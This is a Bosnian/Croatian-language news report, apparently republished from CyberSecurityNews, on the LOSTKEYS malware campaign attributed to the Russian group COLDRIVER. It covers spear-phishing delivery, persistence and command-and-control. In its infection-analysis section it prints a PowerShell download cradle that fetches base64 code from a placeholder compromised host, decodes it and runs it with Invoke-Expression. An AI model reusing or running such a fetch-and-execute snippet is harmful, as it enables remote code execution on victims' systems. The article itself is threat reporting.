Istraživači sajber sigurnosti otkrili su sofisticiranu kampanju malicioznog softvera koja se pripisuje ruskom hakeru COLDRIVER, poznatom i kao Star Blizzard ili Callisto.
Novoidentifikovani maliciozni softver, nazvan LOSTKEYS, primjećen je kako cilja diplomatske institucije, izvođače radova u oblasti odbrane i organizacije kritične infrastrukture širom Evrope i Sjeverne Amerike od početka 2025. godine.
Početna analiza pokazuje da je maliciozni softver posebno dizajniran za operacije krađe podataka , s fokusom na kredencijale, osjetljive dokumente i komunikacije.
LOSTKEYS se prvenstveno širi putem spear-phishing e-poruka koje sadrže maliciozne priloge dokumenata koji iskorištavaju prethodno neotkrivene ranjivosti u popularnom softveru za kancelarijsku produktivnost.
Ovi e-mailovi su pažljivo izrađeni kako bi izgledali legitimno, često maskirani kao prepiska od pouzdanih partnera ili vladinih agencija.
Kada žrtva otvori prilog, višefazni proces infekcije tiho počinje u pozadini, uspostavljajući perzistentnost dok izbjegava otkrivanje od strane konvencionalnih sigurnosnih rješenja.
Istraživači Google Threat Intelligencea identifikovali su kampanju nakon što su uočili neobične obrasce prenosa podataka iz nekoliko visokoprofiliranih organizacija.
Njihova analiza otkrila je sofisticirane tehnike zamagljivanja i infrastrukturu komandovanja i kontrole malicioznog softvera, koja koristi kompromitovane legitimne web stranice kao posrednike kako bi prikrila svoje pravo porijeklo i zakomplikovala napore atribucije.
Uticaj LOSTKEYS infekcija bio je značajan, a pogođene organizacije prijavile su značajnu krađu intelektualnog vlasništva i neovlašćeni pristup osjetljivim komunikacijama.
Prikrivena priroda malicioznog softvera znači da mnoge žrtve ostaju nesvjesne njegovog prisustva duži period, što napadačima omogućava stalan pristup i kontinuirano prikupljanje vrijednih podataka.
Sigurnosne agencije u više zemalja izdale su upozorenja potencijalnim metama o ovoj rastućoj prijetnji.
.webp)
LOSTKEYS demonstrira kontinuiranu evoluciju COLDRIVER-a u sposobnostima i taktikama, predstavljajući značajan napredak u odnosu na njihove prethodne alate.
Ciljani obrasci grupe usklađeni su s ruskim prioritetima strateške obavještajne službe, što dodatno jača povjerenje u atribuciju.
Analiza mehanizma infekcije
Lanac zaraze malicioznim softverom počinje dokumentom koji je pretvoren u oružje i sadrži maskirane VBA makroe.
Kada se izvrše, ovi makroi implementiraju PowerShell program za preuzimanje koji preuzima glavni LOSTKEYS korisni teret: –
$c = New-Object System.Net.WebClient;
$c.Headers.Add("User-Agent","Mozilla/5.0");
$d = $c.DownloadString("hxxps://compromised-site.com/images/update.txt");
$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($d));
Invoke-Expression $decoded
.webp)
Ova početna faza uspostavlja perzistentnost kombinacijom modifikacija registra i kreiranja planiranih zadataka.
Maliciozni softver zatim vrši provjere okruženja kako bi identifikovao sigurnosne alate , izvršavajući manevre izbjegavanja kada je to potrebno.
LOSTKEYS komunicira sa svojim komandnim serverima koristeći šifrovane kanale koji imitiraju legitimni HTTPS promet, što otkrivanje putem mrežnog praćenja čini izuzetno izazovnim.
Modularna arhitektura malicioznog softvera omogućava operaterima da po potrebi implementiraju dodatne mogućnosti, prilagođavajući napad svakoj specifičnoj meti.
Izvor: CyberSecurityNews